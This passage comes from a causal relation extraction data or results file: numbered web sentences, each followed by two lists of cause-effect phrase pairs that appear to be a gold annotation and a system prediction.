[(['radiation', 'therapy'], ['calcification'])]
[]
------------------
Sentence-012 Zinc is essential for growth and cell division
[(['Zinc'], ['growth']), (['Zinc'], ['cell', 'division'])]
[]
------------------
Sentence-013 I too , get a headache from wine , and was always told that it was the sulfites
[(['wine'], ['a', 'headache'])]
[(['wine'], ['a', 'headache'])]
------------------
Sentence-014 Our country is resolving the war and poverty caused by the previous administration
[(['the', 'previous', 'administration'], ['the', 'war']), (['the', 'previous', 'administration'], ['poverty'])]
[(['the', 'previous', 'administration'], ['the', 'war']), (['the', 'previous', 'administration'], ['poverty'])]
------------------
Sentence-015 Like a catch-22 the worst part is that acne causes stress and stress triggers acne breakouts
[(['acne'], ['stress']), (['stress'], ['acne', 'breakouts'])]
[(['acne'], ['stress']), (['stress'], ['acne', 'breakouts'])]
------------------
Sentence-016 Sensitive pets experience rashes and discomfort from ticks and fleas
[(['ticks'], ['rashes']), (['ticks'], ['discomfort']), (['fleas'], ['rashes']), (['fleas'], ['discomfort'])]
[(['ticks'], ['rashes']), (['ticks'], ['discomfort']), (['fleas'], ['rashes']), (['fleas'], ['discomfort'])]
------------------
Sentence-017 Using the product around the house killed germs that were causing flu , colds or sore throat
[(['germs'], ['flu']), (['germs'], ['colds']), (['germs'], ['sore', 'throat'])]
[(['killed', 'germs'], ['flu']), (['killed', 'germs'], ['colds']), (['killed', 'germs'], ['sore', 'throat'])]
------------------
Sentence-018 When the force was generated via the joystick , the reproduced force matched the original force much more accurately
[(['the', 'joystick'], ['the', 'force'])]
[]
------------------
Sentence-019 The problem comes from the widgets resembling HTC's own Sense UI widgets
[(['the', 'widgets'], ['The', 'problem'])]
[(['the', 'widgets'], ['The', 'problem'])]
------------------
Sentence-020 General information about the infection caused by the bacteria called Salmonella , when food is eaten raw or undercooked
[(['the', 'bacteria'], ['the', 'infection'])]
[(['the', 'bacteria'], ['the', 'infection'])]
------------------
Sentence-021 The volunteers enjoy a sense of satisfaction and personal fulfillment from helping others , and recent findings suggest that this feeling may well be a major reason why many people choose to volunteer
[(['helping', 'others'], ['satisfaction']), (['helping', 'others'], ['personal', 'fulfillment'])]
[(['helping', 'others'], ['satisfaction']), (['helping', 'others'], ['personal', 'fulfillment'])]
------------------
Sentence-022 Information about Salmonellosis , an illness caused by a bacteria found in raw food , soil , or water
[(['a', 'bacteria'], ['an', 'illness'])]
[(['a', 'bacteria'], ['an', 'illness'])]
------------------
Sentence-023 The disruption has been caused by work being carried out by track operator Network Rail
[(['work'], ['The', 'disruption'])]
[(['work'], ['The', 'disruption'])]
------------------
Sentence-024 Gross revenues from the selling of crude oil in 2003 reached US 11 508 billion or some 112 85 percent of the amount targeted in the 2003 state budget
[(['the', 'selling'], ['Gross', 'revenues'])]
[(['the', 'selling'], ['Gross', 'revenues'])]
------------------
Sentence-025 More than 4500 tons of nitrogen oxides annually -- a pollutant that causes smog , acid rain , and contributes to asthma attacks and other breathing problems
[(['a', 'pollutant'], ['smog']), (['a', 'pollutant'], ['acid', 'rain']), (['a', 'pollutant'], ['asthma', 'attacks']), (['a', 'pollutant'], ['other', 'breathing', 'problems'])]
[(['a', 'pollutant'], ['smog']), (['a', 'pollutant'], ['acid', 'rain']), (['a', 'pollutant'], ['asthma', 'attacks']), (['a', 'pollutant'], ['other', 'breathing', 'problems'])]
------------------
Sentence-026 Constipation is the most common cause of abdominal pain in the pediatric population
[(['Constipation'], ['abdominal', 'pain'])]
[(['Constipation'], ['abdominal', 'pain'])]
------------------
Sentence-027 The author clearly got a great deal of pleasure from the work and did not allow his vast amount of material to force him into shallow generalizations
[(['the', 'work'], ['pleasure'])]
[(['the', 'work'], ['pleasure'])]
------------------
Sentence-028 Ordinary warts on the hands and feet are caused by viruses , which only affect humans
[(['viruses'], ['Ordinary', 'warts'])]
[(['viruses'], ['Ordinary', 'warts'])]
------------------
Sentence-029 In a person who already has some neck tension from stress , such an event can lead to a long-term increase of neck tension
[(['stress'], ['some', 'neck', 'tension']), (['such', 'an', 'event'], ['a', 'long-term', 'increase'])]
[(['stress'], ['some', 'neck', 'tension']), (['an', 'event'], ['some', 'neck', 'tension'])]
------------------
Sentence-030 The reports regarding the casualties has been announced and the loss that has been caused by the quake is being estimated
[(['the', 'quake'], ['the', 'loss'])]
[(['the', 'quake'], ['the', 'loss'])]
------------------
Sentence-031 The pressure was caused by the rapid power acceleration at the start
[(['the', 'rapid', 'power', 'acceleration'], ['The', 'pressure'])]
[(['the', 'rapid', 'power', 'acceleration'], ['The', 'pressure'])]
------------------
Sentence-032 The incident was caused by the entry of high pressure gas from a deep formation that got confined in the porthole of the well
[(['the', 'entry'], ['The', 'incident'])]
[(['the', 'entry'], ['The', 'incident']), (['high', 'pressure'], ['The', 'incident'])]
------------------
Sentence-033 A method of mitigating the effect of a market spike caused by the triggering and the election of a conditional order includes monitoring conditional orders
[(['the', 'triggering'], ['a', 'market', 'spike']), (['the', 'election'], ['a', 'market', 'spike'])]
[(['the', 'triggering'], ['a', 'market', 'spike']), (['the', 'election'], ['a', 'market', 'spike'])]
------------------
Sentence-034 The largest landslide triggered by the earthquake is located approximately 32 kilometers southeast of Muzafarrabad in a tributary valley of the Jhelum River
[(['the', 'earthquake'], ['The', 'largest', 'landslide'])]
[(['the', 'earthquake'], ['The', 'largest', 'landslide'])]
------------------
Sentence-035 The debris caused a crash on the Schuylkill , and it has been closed for hours because of the mishap
[(['The', 'debris'], ['a', 'crash']), (['the', 'mishap'], ['closed'])]
[(['The', 'debris'], ['a', 'crash'])]
------------------
Sentence-036 Most deaths from the accident were caused by radiation poisoning
[(['the', 'accident'], ['Most', 'deaths']), (['radiation', 'poisoning'], ['Most', 'deaths'])]
[(['the', 'accident'], ['Most', 'deaths']), (['radiation', 'poisoning'], ['Most', 'deaths'])]
------------------
Sentence-037 Using solar electricity instead of conventional electricity sources helps to reduce pollution that causes smog , acid rain , respiratory illness and global warming
[(['pollution'], ['smog']), (['pollution'], ['acid', 'rain']), (['pollution'], ['respiratory', 'illness']), (['pollution'], ['global', 'warming'])]
[(['pollution'], ['smog']), (['pollution'], ['acid', 'rain']), (['pollution'], ['respiratory', 'illness']), (['pollution'], ['global', 'warming'])]
------------------
Sentence-038 The wire had caused a slight injury on the ventral side of the neck and at the base of horns
[(['The', 'wire'], ['a', 'slight', 'injury'])]
[(['The', 'wire'], ['a', 'slight', 'injury'])]
------------------
Sentence-039 A stereo buss outputs the stereo buss signal ; a record buss outputs the record buss signal
[(['A', 'stereo', 'buss'], ['the', 'stereo', 'buss', 'signal']), (['a', 'record', 'buss'], ['the', 'record', 'buss', 'signal'])]
[]
------------------
Sentence-040 These are all symptoms of the muscle paralysis caused by the bacterial toxin
[(['the', 'bacterial', 'toxin'], ['the', 'muscle', 'paralysis'])]
[(['the', 'bacterial', 'toxin'], ['all', 'symptoms']), (['the', 'bacterial', 'toxin'], ['the', 'muscle', 'paralysis'])]
------------------
Sentence-041 The cow makes a sound called lowing , also known as mooing
[(['The', 'cow'], ['a', 'sound'])]
[(['The', 'cow'], ['a', 'sound'])]
------------------
Sentence-042 The changes now seen in the endometrium are caused by a hormone called progesterone
[(['a', 'hormone'], ['The', 'changes'])]
[(['a', 'hormone'], ['The', 'changes'])]
------------------
Sentence-043 Generally it appears that most of the damage was caused by the winds and the rough seas
[(['the', 'winds'], ['the', 'damage']), (['the', 'rough', 'seas'], ['the', 'damage'])]
[(['the', 'winds'], ['the', 'damage']), (['the', 'rough', 'seas'], ['the', 'damage'])]
------------------
Sentence-044 Earthquakes are caused by the discharge of accumulated along geologic faults
[(['the', 'discharge'], ['Earthquakes'])]
[(['the', 'discharge'], ['Earthquakes'])]
------------------
Sentence-045 Dry air , dust and wind dry out the nose and throat and cause nosebleeds , coughing , wheezing , and other short-term respiratory problems
[(['Dry', 'air'], ['nosebleeds']), (['Dry', 'air'], ['coughing']), (['Dry', 'air'], ['wheezing']), (['Dry', 'air'], ['other', 'short-term', 'respiratory', 'problems']), (['dust'], ['nosebleeds']), (['dust'], ['coughing']), (['dust'], ['wheezing']), (['dust'], ['other', 'short-term', 'respiratory', 'problems']), (['wind'], ['nosebleeds']), (['wind'], ['coughing']), (['wind'], ['wheezing']), (['wind'], ['other', 'short-term', 'respiratory', 'problems'])]
[(['Dry', 'air'], ['nosebleeds']), (['Dry', 'air'], ['coughing']), (['Dry', 'air'], ['wheezing']), (['Dry', 'air'], ['other', 'short-term', 'respiratory', 'problems']), (['dust'], ['nosebleeds']), (['dust'], ['coughing']), (['dust'], ['wheezing']), (['dust'], ['other', 'short-term', 'respiratory', 'problems']), (['wind', 'dry'], ['nosebleeds']), (['wind', 'dry'], ['coughing']), (['wind', 'dry'], ['wheezing']), (['wind', 'dry'], ['other', 'short-term', 'respiratory', 'problems'])]
------------------
Sentence-046 The Fujita Scale is used to rate the intensity of a tornado by examining the damage caused by the tornado after it has passed over a man-made structure
[(['the', 'tornado'], ['the', 'damage'])]
[(['the', 'tornado'], ['the', 'damage'])]
------------------
Sentence-047 Every child and young person seen at Starship with intoxication from alcohol or illicit drug use had a social work assessment before leaving the hospital
[(['alcohol', 'or', 'illicit', 'drug', 'use'], ['intoxication'])]
[(['alcohol'], ['intoxication'])]
------------------
Sentence-048 Seniors get much joy from animals
[(['animals'], ['much', 'joy'])]
[(['animals'], ['much', 'joy'])]
------------------
Sentence-049 He created and advocated " flower power,"a strategy in which antiwar demonstrators promoted positive values like peace and love to dramatize their opposition to the destruction and death caused by the war in Vietnam
[(['the', 'war'], ['the', 'destruction']), (['the', 'war'], ['death'])]
[(['the', 'war'], ['the', 'destruction']), (['the', 'war'], ['death'])]
------------------
Sentence-050 I have found that I have extremely sensitive skin and most cleaners cause rash or a burning sensation if it has contact with my skin
[(['most', 'cleaners'], ['rash']), (['most', 'cleaners'], ['a', 'burning', 'sensation'])]
[]
------------------
Sentence-051 The grief from sudden death is completely different from expected death , when families have time to prepare and say goodbye
[(['sudden', 'death'], ['The', 'grief'])]
[(['sudden', 'death'], ['The', 'grief'])]
------------------
Sentence-052 The transmitter emits a constant radio signal to crea
[(['The', 'transmitter'], ['a', 'constant', 'radio', 'signal'])]
[(['The', 'transmitter'], ['a', 'constant', 'radio', 'signal'])]
------------------
Sentence-053 The explosion caused a gas leak on the pipeline near the village of Pouce Coupe , south of Dawson Creek
[(['The', 'explosion'], ['a', 'gas', 'leak'])]
[(['The', 'explosion'], ['a', 'gas', 'leak'])]
------------------
Sentence-054 There were setbacks and technical problems that ensued from the location design , flooding , and moisture that plagued the winery and bumped up the investment cost beyond the initial budgetary estimates
[(['the', 'location', 'design'], ['setbacks']), (['the', 'location', 'design'], ['technical', 'problems']), (['flooding'], ['setbacks']), (['flooding'], ['technical', 'problems']), (['moisture'], ['setbacks']), (['moisture'], ['technical', 'problems'])]
[(['the', 'location', 'design'], ['setbacks']), (['the', 'location', 'design'], ['technical', 'problems']), (['flooding'], ['setbacks']), (['flooding'], ['technical', 'problems']), (['moisture'], ['setbacks']), (['moisture'], ['technical', 'problems'])]
------------------
Sentence-055 Sudden death from inhalation of petroleum distillates is well recognised in misuses of volatile substances
[(['inhalation'], ['Sudden', 'death'])]
[(['inhalation'], ['Sudden', 'death'])]
------------------
Sentence-056 The hull caused a scratch on the eye and that is why it's not healing all the way
[(['The', 'hull'], ['a', 'scratch'])]
[(['The', 'hull'], ['a', 'scratch'])]
------------------
Sentence-057 The widespread opinion that protein and phosphorus cause calcium loss is examined
[(['protein'], ['calcium', 'loss']), (['phosphorus'], ['calcium', 'loss'])]
[(['The', 'widespread', 'opinion'], ['calcium', 'loss']), (['protein'], ['calcium', 'loss']), (['phosphorus'], ['calcium', 'loss'])]
------------------
Sentence-058 Eighty-four percent of the complications resulted in patient deaths , while 16 percent resulted in a serious injury
[(['the', 'complications'], ['patient', 'deaths']), (['the', 'complications'], ['a', 'serious', 'injury'])]
[(['the', 'complications'], ['patient', 'deaths']), (['the', 'complications'], ['a', 'serious', 'injury'])]
------------------
Sentence-059 The crashes resulted in the collapse of much of the World Trade Center complex , the destruction of part of the southwest side of the Pentagon
[(['The', 'crashes'], ['the', 'collapse']), (['The', 'crashes'], ['the', 'destruction'])]
[(['The', 'crashes'], ['the', 'collapse'])]
------------------
Sentence-060 The pollution from animal factories is also destroying parts of the world's oceans
[(['animal', 'factories'], ['The', 'pollution'])]
[(['animal', 'factories'], ['The', 'pollution'])]
------------------
Sentence-061 When the first model sank in August 1991 , the crash caused a seismic event registering 3 0 on the Richter scale , and left nothing but a pile of debris at 220m of depth
[(['the', 'crash'], ['a', 'seismic', 'event'])]
[(['the', 'crash'], ['a', 'seismic', 'event'])]
------------------
Sentence-062 The clock struck twelve with a loud chime that made me jump
[(['The', 'clock'], ['a', 'loud', 'chime'])]
[]
------------------
Sentence-063 Later on that same day , an electrical short at the Farragut North station caused a fire on the tracks which shut down service three times over the course of the day
[(['an', 'electrical', 'short'], ['a', 'fire'])]
[(['an', 'electrical'], ['a', 'fire'])]
------------------
Sentence-064 Arcane Subtlety reduced the threat caused by Polymorph by 40 at max rank , though the threat caused by the spell is minimal
[(['Polymorph'], ['the', 'threat']), (['the', 'spell'], ['the', 'threat'])]
[(['Polymorph'], ['the', 'threat']), (['the', 'spell'], ['the', 'threat'])]
------------------
Sentence-065 Sip the tea slowly to reduce stomach pain from indigestion , bloating and feeling of fullness
[(['indigestion'], ['stomach', 'pain']), (['bloating'], ['stomach', 'pain']), (['feeling'], ['stomach', 'pain'])]
[(['indigestion'], ['stomach', 'pain']), (['bloating'], ['stomach', 'pain']), (['feeling'], ['stomach', 'pain'])]
------------------
Sentence-066 Alcohol and drugs directly cause suicide by significantly diminishing the reasoning of the person at the time of the suicide
[(['Alcohol'], ['suicide']), (['drugs'], ['suicide'])]
[(['Alcohol'], ['suicide']), (['drugs'], ['suicide'])]
------------------
Sentence-067 Cutler ended up with a bleeding stomach ulcer caused by the stress and hard work supervising their tours twenty-four hours a day
[(['the', 'stress'], ['a', 'bleeding', 'stomach', 'ulcer']), (['hard', 'work'], ['a', 'bleeding', 'stomach', 'ulcer'])]
[(['the', 'stress'], ['a', 'bleeding', 'stomach', 'ulcer']), (['hard', 'work'], ['a', 'bleeding', 'stomach', 'ulcer'])]
------------------
Sentence-068 The movie gives the inaccurate impression that the Apaches all surrendered
[(['The', 'movie'], ['the', 'inaccurate', 'impression'])]
[(['The', 'movie'], ['the', 'inaccurate', 'impression'])]
------------------
Sentence-069 Discussion ensued from the Florida contingent on the fact that very stringent landowner protection laws in Florida make it imperative that the highest supportable appraised vallue be offered first
[(['the', 'Florida', 'contingent'], ['Discussion'])]
[(['the', 'Florida', 'contingent'], ['Discussion'])]
------------------
Sentence-070 The election was caused by the appointment of Donald Sumner , formerly Conservative MP for Orpington , to be a county court judge
[(['the', 'appointment'], ['The', 'election'])]
[(['the', 'appointment'], ['The', 'election'])]
------------------
Sentence-071 The malfunctions on Monday caused delays for patrons waiting to check out or renew books at the branches , and impeded access to personal accounts that allow users to renew or hold books online
[(['The', 'malfunctions'], ['delays'])]
[(['The', 'malfunctions'], ['delays'])]
------------------
Sentence-072 Colds and flu cause inflammation of the mucous membranes of the nose , throat and mouth
[(['Colds'], ['inflammation']), (['flu'], ['inflammation'])]
[(['Colds'], ['inflammation']), (['flu'], ['inflammation'])]
------------------
Sentence-073 Most illnesses , including colds and flu , cause a toxic overload that also increases the stress on the kidneys
[(['colds'], ['a', 'toxic', 'overload']), (['flu'], ['a', 'toxic', 'overload'])]
[(['colds'], ['a', 'toxic', 'overload']), (['flu'], ['a', 'toxic', 'overload'])]
------------------
Sentence-074 An alert victim with a broken neck or severely torn ligament has enough discomfort from the injury and muscle spasm to force him to hold his neck still
[(['the', 'injury'], ['enough', 'discomfort'])]
[(['the', 'injury'], ['enough', 'discomfort']), (['muscle', 'spasm'], ['enough', 'discomfort'])]
------------------
Sentence-075 An oil spill caused by a collision between a ship and a barge closed the ship channel servicing the nation's second largest port
[(['a', 'collision'], ['An', 'oil', 'spill'])]
[(['a', 'collision'], ['An', 'oil', 'spill'])]
------------------
Sentence-076 The funds raised through this appeal have a direct impact on the people affected by the severe devastations caused by the storms
[(['the', 'storms'], ['the', 'severe', 'devastations'])]
[(['the', 'storms'], ['the', 'severe', 'devastations'])]
------------------
Sentence-077 After the war , as the Midway was preparing for retirement , she was called upon one last time to the Philippines to help with an evacuation after the eruption of Mt Pinatubo
[(['the', 'eruption'], ['an', 'evacuation'])]
[(['the', 'war'], ['an', 'evacuation']), (['the', 'eruption'], ['an', 'evacuation'])]
------------------
Sentence-078 Infection is one of the commonest causes of death in burn patients , particularly
[(['Infection'], ['death'])]
[(['Infection'], ['death'])]
------------------
Sentence-079 When a tsunami is generated by a strong offshore earthquake , its first waves would reach the outer coast minutes after the ground stops shaking
[(['a', 'strong', 'offshore', 'earthquake'], ['a', 'tsunami'])]
[(['a', 'strong', 'offshore', 'earthquake'], ['a', 'tsunami']), (['the', 'ground', 'stops', 'shaking'], ['a', 'tsunami'])]
------------------
Sentence-080 The afterglow is produced by shock waves in the jets of tenuous gas that shoot from the blast at almost the speed of light
[(['shock', 'waves'], ['The', 'afterglow'])]
[(['shock', 'waves'], ['The', 'afterglow'])]
------------------
Sentence-081 Eye discomfort from this staring effect is exacerbated by low humidity
[(['this', 'staring', 'effect'], ['Eye', 'discomfort'])]
[(['this', 'staring', 'effect'], ['Eye', 'discomfort']), (['low', 'humidity'], ['Eye', 'discomfort'])]
------------------
Sentence-082 The accident caused a major traffic snarl on the arterial road
[(['The', 'accident'], ['a', 'major', 'traffic', 'snarl'])]
[(['The', 'accident'], ['a', 'major', 'traffic', 'snarl'])]
------------------
Sentence-083 Germs are microscopic organisms that cause sickness or disease
[(['Germs'], ['sickness']), (['Germs'], ['disease'])]
[(['microscopic', 'organisms'], ['sickness']), (['microscopic', 'organisms'], ['disease'])]
------------------
Sentence-084 When I start the engine the car makes a screaching sound
[(['the', 'car'], ['a', 'screaching', 'sound'])]
[(['the', 'engine', 'the', 'car'], ['a', 'screaching', 'sound'])]
------------------
Sentence-085 Over 90 of the cases of ringworm of the scalp are caused by Trichophyton tonsurans , a fungus that infects the hairs and causes them to break
[(['Trichophyton', 'tonsurans'], ['ringworm'])]
[(['Trichophyton', 'tonsurans'], ['ringworm']), (['a', 'fungus'], ['ringworm'])]
------------------
Sentence-086 The accolade was decided upon after an intense discussion between about 200 members
[(['an', 'intense', 'discussion'], ['The', 'accolade'])]
[]
------------------
Sentence-087 The boom and shaking was caused by the asteroid that passed Earth yesterday
[(['the', 'asteroid'], ['The', 'boom']), (['the', 'asteroid'], ['shaking'])]
[(['the', 'asteroid'], ['The', 'boom']), (['the', 'asteroid'], ['shaking'])]
------------------
Sentence-088 The damage caused by a bullet depends on the amount of energy which it transfers to the tissues
[(['a', 'bullet'], ['The', 'damage'])]
[(['a', 'bullet'], ['The', 'damage'])]
------------------
Sentence-089 Headaches , dizziness , balance problems , and neck and back pain were caused by the work injury
[(['the', 'work', 'injury'], ['Headaches']), (['the', 'work', 'injury'], ['dizziness']), (['the', 'work', 'injury'], ['balance', 'problems']), (['the', 'work', 'injury'], ['neck', 'and', 'back', 'pain'])]
[(['the', 'work', 'injury'], ['Headaches']), (['the', 'work', 'injury'], ['dizziness']), (['the', 'work', 'injury'], ['balance', 'problems']), (['the', 'work', 'injury'], ['neck', 'and', 'back', 'pain'])]
------------------
Sentence-090 The energy of emission produces the separation field
[(['The', 'energy'], ['the', 'separation', 'field'])]
[]
------------------
Sentence-091 Vulvodynia is the cause of chronic vulval pain in the absence of skin disease and infection
[(['Vulvodynia'], ['chronic', 'vulval', 'pain'])]
[(['Vulvodynia'], ['chronic', 'vulval', 'pain'])]
------------------
Sentence-092 Landslides caused the majority of the deaths
[(['Landslides'], ['the', 'deaths'])]
[(['Landslides'], ['the', 'majority']), (['Landslides'], ['the', 'deaths'])]
------------------
Sentence-093 The pipeline had to face the following main concerns from opposition : disturbance of animal migration patterns , environmental damage from spills , geological concerns and the Alaskan permafrost
[(['spills'], ['environmental', 'damage'])]
[(['opposition'], ['environmental', 'damage']), (['disturbance'], ['environmental', 'damage']), (['spills'], ['environmental', 'damage']), (['geological', 'concerns'], ['environmental', 'damage']), (['the', 'Alaskan', 'permafrost'], ['environmental', 'damage'])]
------------------
Sentence-094 The swelling of the vocal fold mucosa is caused by smoking
[(['smoking'], ['The', 'swelling'])]
[(['smoking'], ['The', 'swelling'])]
------------------
Sentence-095 Paralysis or convulsions are caused by hormone deficiencies and imbalances
[(['hormone', 'deficiencies', 'and', 'imbalances'], ['Paralysis']), (['hormone', 'deficiencies', 'and', 'imbalances'], ['convulsions'])]
[(['hormone', 'deficiencies'], ['Paralysis']), (['hormone', 'deficiencies'], ['convulsions']), (['imbalances'], ['Paralysis']), (['imbalances'], ['convulsions'])]
------------------
Sentence-096 In economic terms , the ecological catastrophe caused by the Prestige oil spill is comparable with that caused by the Exxon Valdez
[(['the', 'Prestige', 'oil', 'spill'], ['the', 'ecological', 'catastrophe']), (['the', 'Exxon', 'Valdez'], ['the', 'ecological', 'catastrophe'])]
[(['the', 'Prestige', 'oil', 'spill'], ['the', 'ecological', 'catastrophe']), (['the', 'Exxon', 'Valdez'], ['the', 'ecological', 'catastrophe'])]
------------------
Sentence-097 Inhibition through synaptic depression is unlike the previous forms of inhibition in that it turns on more slowly and thus acts as delayed negative feedback
[(['synaptic', 'depression'], ['Inhibition'])]
[(['synaptic', 'depression'], ['Inhibition'])]
------------------
Sentence-098 Before he leaves Ephesus , however , a riot breaks out , instigated by the silversmiths who manufacture idols of the goddess Artemis ; they are afraid that Paul's evangelistic success will ruin their business
[(['the', 'silversmiths'], ['a', 'riot'])]
[(['the', 'silversmiths'], ['a', 'riot', 'breaks'])]
------------------
Sentence-099 As the molten metal cools , it hardens and assumes the shape created by the mold's cavity
[(['the', "mold's", 'cavity'], ['the', 'shape'])]
[(['the', "mold's", 'cavity'], ['the', 'shape'])]
------------------
Sentence-100 Whooping cough is another name for the pertussis , an infection of the airways caused by the bacteria bordetella pertussis
[(['the', 'bacteria', 'bordetella', 'pertussis'], ['the', 'pertussis'])]
[(['the', 'bacteria', 'bordetella', 'pertussis'], ['an', 'infection'])]
------------------
Sentence-101 The accident caused a traffic snarl on the ever busy bridge leading to diversions to other routes
[(['The', 'accident'], ['a', 'traffic', 'snarl'])]
[(['The', 'accident'], ['a', 'traffic', 'snarl'])]
------------------
Sentence-102 The genreal anesthetic cause unconsciousness and insensibility to paid and are used for major surgical procedures
[(['The', 'genreal', 'anesthetic'], ['unconsciousness']), (['The', 'genreal', 'anesthetic'], ['insensibility'])]
[(['The', 'genreal', 'anesthetic'], ['unconsciousness'])]
------------------
Sentence-103 The alleged abuse resulted in bruises and swelling of the brain
[(['The', 'alleged', 'abuse'], ['bruises']), (['The', 'alleged', 'abuse'], ['swelling'])]
[(['The', 'alleged', 'abuse'], ['bruises']), (['The', 'alleged', 'abuse'], ['swelling'])]
------------------
Sentence-104 Companies face big risk from loss of key employees
[(['loss'], ['big', 'risk'])]
[(['loss'], ['big', 'risk'])]
------------------
Sentence-105 Obama's economic policies are turning into a global disaster
[(["Obama's", 'economic', 'policies'], ['a', 'global', 'disaster'])]
[]
------------------
Sentence-106 Tsunamis are caused by the sudden displacement of large volumes of water
[(['the', 'sudden', 'displacement'], ['Tsunamis'])]
[(['the', 'sudden', 'displacement'], ['Tsunamis'])]
------------------
Sentence-107 The electricity is produced by 440 nuclear reactors in 31 countries
[(['440', 'nuclear', 'reactors'], ['The', 'electricity'])]
[(['440', 'nuclear', 'reactors'], ['The', 'electricity'])]
------------------
Sentence-108 The relative calm produced by the Shia ceasefire has coincided with what the CIA is now calling the " near strategic defeat " of al-Qaeda in Iraq
[(['the', 'Shia', 'ceasefire'], ['The', 'relative', 'calm'])]
[(['the', 'Shia', 'ceasefire'], ['The', 'relative', 'calm'])]
------------------
Sentence-109 A trend has been caused by the growing absolute numbers of young people on the planet , and by the rising unemployment rate
[(['the', 'growing', 'absolute', 'numbers'], ['A', 'trend']), (['the', 'rising', 'unemployment', 'rate'], ['A', 'trend'])]
[(['the', 'growing', 'absolute', 'numbers'], ['A', 'trend']), (['the', 'rising', 'unemployment', 'rate'], ['A', 'trend'])]
------------------
Sentence-110 Patients with adenomyosis experience pain from this disease in the early 30's
[(['this', 'disease'], ['adenomyosis', 'experience', 'pain'])]
[(['this', 'disease'], ['pain'])]
------------------
Sentence-111 Liver plays key role in how steroids cause diabetes and hypertension
[(['steroids'], ['diabetes']), (['steroids'], ['hypertension'])]
[(['Liver'], ['diabetes']), (['Liver'], ['hypertension']), (['steroids'], ['diabetes']), (['steroids'], ['hypertension'])]
------------------
Sentence-112 The drag caused by the Earth's atmosphere works against a rocket or a water molecule
[(['the', "Earth's", 'atmosphere'], ['The', 'drag'])]
[(['the', "Earth's", 'atmosphere', 'works'], ['The', 'drag'])]
------------------
Sentence-113 Finally , Slone's fear of AIDS and the mental distress she suffered from this fear were caused by the needle stab
[(['the', 'needle', 'stab'], ["Slone's", 'fear']), (['the', 'needle', 'stab'], ['the', 'mental', 'distress'])]
[(['the', 'needle', 'stab'], ['the', 'mental', 'distress']), (['the', 'needle', 'stab'], ['this', 'fear'])]
------------------
Sentence-114 Conflict had caused the collapse of the Somali Republic
[(['Conflict'], ['the', 'collapse'])]
[(['Conflict'], ['the', 'collapse'])]
------------------
Sentence-115 The dust , noise , and sleep deprivation produced by the construction are intolerable
[(['the', 'construction'], ['The', 'dust']), (['the', 'construction'], ['noise']), (['the', 'construction'], ['sleep', 'deprivation'])]
[(['the', 'construction'], ['sleep', 'deprivation'])]
------------------
Sentence-116 If a participant complaint is the source of an investigative lead , interim contact with the participant should be made by the investigator
[(['a', 'participant', 'complaint'], ['an', 'investigative', 'lead'])]
[(['a', 'participant', 'complaint'], ['an', 'investigative', 'lead']), (['a', 'participant', 'complaint'], ['interim', 'contact'])]
------------------
Sentence-117 The incoming water caused a stain on the wall that , through the lens of pareidolia , looked like a bearded man with a big afro hairdo
[(['The', 'incoming', 'water'], ['a', 'stain'])]
[(['The', 'incoming', 'water'], ['a', 'stain'])]
------------------
Sentence-118 Much like the virus that caused the 1918 flu pandemic , this new H1N1 flu virus affects young adults and school children in greater numbers
[(['the', 'virus'], ['the', '1918', 'flu', 'pandemic'])]
[(['the', 'virus'], ['the', '1918', 'flu', 'pandemic'])]
------------------
Sentence-119 The cysts are caused by chronic inflammation of the perichondrium with production of serous fluid between the perichondrium and cartilage
[(['chronic', 'inflammation'], ['The', 'cysts'])]
[(['chronic', 'inflammation'], ['The', 'cysts'])]
------------------
Sentence-120 Menopause and PMS cause stress and anxiety even without imbalanced hormones
[(['Menopause'], ['stress']), (['Menopause'], ['anxiety']), (['PMS'], ['stress']), (['PMS'], ['anxiety'])]
[(['Menopause'], ['stress']), (['Menopause'], ['anxiety']), (['PMS'], ['stress']), (['PMS'], ['anxiety'])]
------------------
Sentence-121 A spaghetti pie served at a church dinner had caused the poisoning of one hundred people
[(['A', 'spaghetti', 'pie'], ['the', 'poisoning'])]
[(['A', 'spaghetti', 'pie'], ['the', 'poisoning'])]
------------------
Sentence-122 About 30 ducks were found dead in Klamath County in the past two days , and officials are investigating whether the deaths are from a cholera outbreak
[(['a', 'cholera', 'outbreak'], ['the', 'deaths'])]
[(['a', 'cholera', 'outbreak'], ['the', 'deaths'])]
------------------
Sentence-123 Aware of the suffering caused by exploitation , social injustice , stealing , and oppression , I am committed to cultivate loving kindness and learn ways to work for the well-being of people , animals , plants , and minerals
[(['exploitation'], ['the', 'suffering']), (['social', 'injustice'], ['the', 'suffering']), (['stealing'], ['the', 'suffering']), (['oppression'], ['the', 'suffering'])]
[(['exploitation'], ['the', 'suffering']), (['social', 'injustice'], ['the', 'suffering']), (['stealing'], ['the', 'suffering']), (['oppression'], ['the', 'suffering'])]
------------------
Sentence-124 Getting help has reduced the time to reverse all the irritation that had been caused by the fungus
[(['the', 'fungus'], ['all', 'the', 'irritation'])]
[(['the', 'fungus'], ['all', 'the', 'irritation'])]
------------------
Sentence-125 The worst pain of all was caused by the torment to her head which was like the pain of thorns pressing into her
[(['the', 'torment'], ['The', 'worst', 'pain'])]
[(['the', 'torment'], ['The', 'worst', 'pain'])]
------------------
Sentence-126 Oak root and chamomile provide a gentle astringent that helps reduce inflammation and calms skin irritation from the sun and environmental pollutants
[(['the', 'sun'], ['skin', 'irritation']), (['environmental', 'pollutants'], ['skin', 'irritation'])]
[(['the', 'sun'], ['inflammation']), (['the', 'sun'], ['calms', 'skin', 'irritation']), (['environmental', 'pollutants'], ['inflammation']), (['environmental', 'pollutants'], ['calms', 'skin', 'irritation'])]
------------------
Sentence-127 The earthquake caused the failures of the electric power system , the water supply system , the sewer system , the telephone and telegraph systems
[(['The', 'earthquake'], ['the', 'failures'])]
[(['The', 'earthquake'], ['the', 'failures'])]
------------------
Sentence-128 Plantar warts are caused by a virus that infects the outer layer of skin on the soles of the feet
[(['a', 'virus'], ['Plantar', 'warts'])]
[(['a', 'virus'], ['Plantar', 'warts'])]
------------------
Sentence-129 The contortions are caused by gravitational interactions with the small satellites Prometheus and Pandora
[(['gravitational', 'interactions'], ['The', 'contortions'])]
[(['gravitational', 'interactions'], ['The', 'contortions'])]
------------------
Sentence-130 Givers gain moral strength and happiness from giving
[(['giving'], ['moral', 'strength']), (['giving'], ['happiness'])]
[(['giving'], ['moral', 'strength']), (['giving'], ['happiness'])]
------------------
Sentence-131 Thus , evaluating capital punishment as a form of retribution is reduced by Sellin to merely estimating the proportion of capital murders that result in execution
[(['capital', 'murders'], ['execution'])]
[(['capital', 'murders'], ['retribution']), (['capital', 'murders'], ['execution'])]
------------------
